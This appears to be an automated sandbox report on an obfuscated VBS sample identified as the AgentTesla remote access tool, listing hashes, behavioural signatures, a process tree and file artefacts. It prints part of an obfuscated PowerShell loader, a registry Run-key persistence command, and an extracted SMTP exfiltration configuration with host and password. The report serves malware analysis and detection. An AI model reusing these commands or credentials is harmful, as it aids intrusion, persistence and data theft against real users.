Analysis
- max time kernel: 142s
- max time network: 147s
- platform: windows7_x64
- resource: win7-20240611-en
- resource tags: arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
- submitted: 19-06-2024 14:56

Static task: static1

Behavioral task: behavioral1
- Sample: 09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs
- Resource: win7-20240611-en

Behavioral task: behavioral2
- Sample: 09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs
- Resource: win10v2004-20240226-en
General
- Target: 09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs
- Size: 91KB
- MD5: 44d9ad2f0db6d4cb899d6657974c817b
- SHA1: 1a76e0f99bffc9a92c8578f87538f2efb2b94ec9
- SHA256: 09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19
- SHA512: 09b6a077beed527f4756d9d20f696a66976537e1fcef947fa29ac8e8f9c761be83297a07920e050f4df1ca16d41b11b51298d9d72f45ad352e5166fd95a68c8b
- SSDEEP: 1536:w01/LsA0DnkdzhX7RXaSMmr2rFHxsASgxWxCwhrdM5XRyz29KWFj:w09LB0DnWzhX7RXaSMxhxsAhWEwhrdMZ
Malware Config

Extracted
agenttesla
- Protocol: smtp
- Host: mail.myhydropowered.com
- Port: 587
- Username: [email protected]
- Password: n8h0yvDxAKrtxKB
- Email To: [email protected]
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Blocklisted process makes network request (2 IoCs)
  Processes:
    flow  pid  Process
    3     916  powershell.exe
    5     916  powershell.exe
- Adds Run key to start application (2 TTPs, 2 IoCs)
  Processes:
    description      ioc                                                                                                                                                                                                                                        Process
    Set value (str)  \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Windows\CurrentVersion\Run\Delngler = "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\\litteratursociologi\\').Hirstie;%Grusvejene% ($erasement)"  reg.exe
    Set value (str)  \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Windows\CurrentVersion\Run\DtcHF = "C:\\Users\\Admin\\AppData\\Roaming\\DtcHF\\DtcHF.exe"                                                                  wab.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
- Looks up external IP address via web service (3 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
    flow  ioc
    12    api.ipify.org
    13    api.ipify.org
    14    ip-api.com
- Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
  Processes:
    pid   Process
    2784  wab.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  Processes:
    pid   Process
    1700  powershell.exe
    2784  wab.exe
- Suspicious use of SetThreadContext (1 IoCs)
  Processes:
    description                          pid   Process         procid_target
    PID 1700 set thread context of 2784  1700  powershell.exe  34
- Modifies registry key (1 TTPs, 1 IoCs)
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes:
    pid   Process
    916   powershell.exe
    1700  powershell.exe
    1700  powershell.exe
    2784  wab.exe
    2784  wab.exe
- Suspicious behavior: MapViewOfSection (1 IoCs)
  Processes:
    pid   Process
    1700  powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    description              pid   Process
    Token: SeDebugPrivilege  916   powershell.exe
    Token: SeDebugPrivilege  1700  powershell.exe
    Token: SeDebugPrivilege  2784  wab.exe
- Suspicious use of WriteProcessMemory (28 IoCs)
  Processes:
    description                        pid   Process         procid_target
    PID 948 wrote to memory of 916     948   WScript.exe     28
    PID 948 wrote to memory of 916     948   WScript.exe     28
    PID 948 wrote to memory of 916     948   WScript.exe     28
    PID 916 wrote to memory of 2020    916   powershell.exe  30
    PID 916 wrote to memory of 2020    916   powershell.exe  30
    PID 916 wrote to memory of 2020    916   powershell.exe  30
    PID 916 wrote to memory of 1700    916   powershell.exe  32
    PID 916 wrote to memory of 1700    916   powershell.exe  32
    PID 916 wrote to memory of 1700    916   powershell.exe  32
    PID 916 wrote to memory of 1700    916   powershell.exe  32
    PID 1700 wrote to memory of 2152   1700  powershell.exe  33
    PID 1700 wrote to memory of 2152   1700  powershell.exe  33
    PID 1700 wrote to memory of 2152   1700  powershell.exe  33
    PID 1700 wrote to memory of 2152   1700  powershell.exe  33
    PID 1700 wrote to memory of 2784   1700  powershell.exe  34
    PID 1700 wrote to memory of 2784   1700  powershell.exe  34
    PID 1700 wrote to memory of 2784   1700  powershell.exe  34
    PID 1700 wrote to memory of 2784   1700  powershell.exe  34
    PID 1700 wrote to memory of 2784   1700  powershell.exe  34
    PID 1700 wrote to memory of 2784   1700  powershell.exe  34
    PID 2784 wrote to memory of 2832   2784  wab.exe         35
    PID 2784 wrote to memory of 2832   2784  wab.exe         35
    PID 2784 wrote to memory of 2832   2784  wab.exe         35
    PID 2784 wrote to memory of 2832   2784  wab.exe         35
    PID 2832 wrote to memory of 2652   2832  cmd.exe         37
    PID 2832 wrote to memory of 2652   2832  cmd.exe         37
    PID 2832 wrote to memory of 2652   2832  cmd.exe         37
    PID 2832 wrote to memory of 2652   2832  cmd.exe         37
Processes
- C:\Windows\System32\WScript.exe
  Command: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs"
  - Suspicious use of WriteProcessMemory
  PID: 948
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command: powershell -windowstyle 1 "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);} [... obfuscated string-encoded payload omitted ...]"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 916
    - C:\Windows\system32\cmd.exe
      Command: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"
      PID: 2020
    - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      Command: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);} [... obfuscated string-encoded payload omitted ...]"
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 1700
      - C:\Windows\SysWOW64\cmd.exe
        Command: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"
        PID: 2152
      - C:\Program Files (x86)\windows mail\wab.exe
        Command: "C:\Program Files (x86)\windows mail\wab.exe"
        - Adds Run key to start application
        - Suspicious use of NtCreateThreadExHideFromDebugger
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 2784
        - C:\Windows\SysWOW64\cmd.exe
          Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"
          - Suspicious use of WriteProcessMemory
          PID: 2832
          - C:\Windows\SysWOW64\reg.exe
            Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"
            - Adds Run key to start application
            - Modifies registry key
            PID: 2652
Downloads
- Filesize: 8KB
  MD5: 5c220ed75280c181214fd09e1eed5be5
  SHA1: 8632a068505754d734915e2cdb4b23fca1324e3b
  SHA256: 2c372644fac0b493dc938395727bcb7a2913955dbacbf50b577114ca63e73088
  SHA512: 5422ee3ea40a6d1d9bd3617bc42fc6dbd9589f57e04bb72fa5518df5e64232ccc20ccb0a03b233770537feaffab1070491efd01c42f54f60a63b14da57e1c69a
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YZGRX9C61X669HDJJLQ6.temp
  Filesize: 7KB
  MD5: 2d98cb939b6fccc0c0b74478f518ba8d
  SHA1: 11902caa2dcc93e39cb0d8e3a059426ac2ff2962
  SHA256: 78edc4b662409c595c12f41e08fd6eafc4a1a1fd822e3bb9f161e1c9f8ce7a7d
  SHA512: 962538a76666473f0586740dcb2a8369ad5d810da161f7a15969e189e67dafbbe53c5eda80114301e3b174f781cd3de852d50fa3a76e9e609faad4f5a7d65f52
- Filesize: 475KB
  MD5: c990e3d829b26e351547c77df1bc5953
  SHA1: df0592b47bea01cc3199012205c3bf55545fb09e
  SHA256: f2108dfabed7091171e5c3219a76a955ae6b4d4632d685ead292f346ecf99822
  SHA512: f1f78838d6aae755d74f5dcb21b3d5b8f9100937caae28e0c7fdf6dcc39e382bc02e7040bdc4b682ac7148c987bb59f86aa3c36fa769dd85b40a0543361789da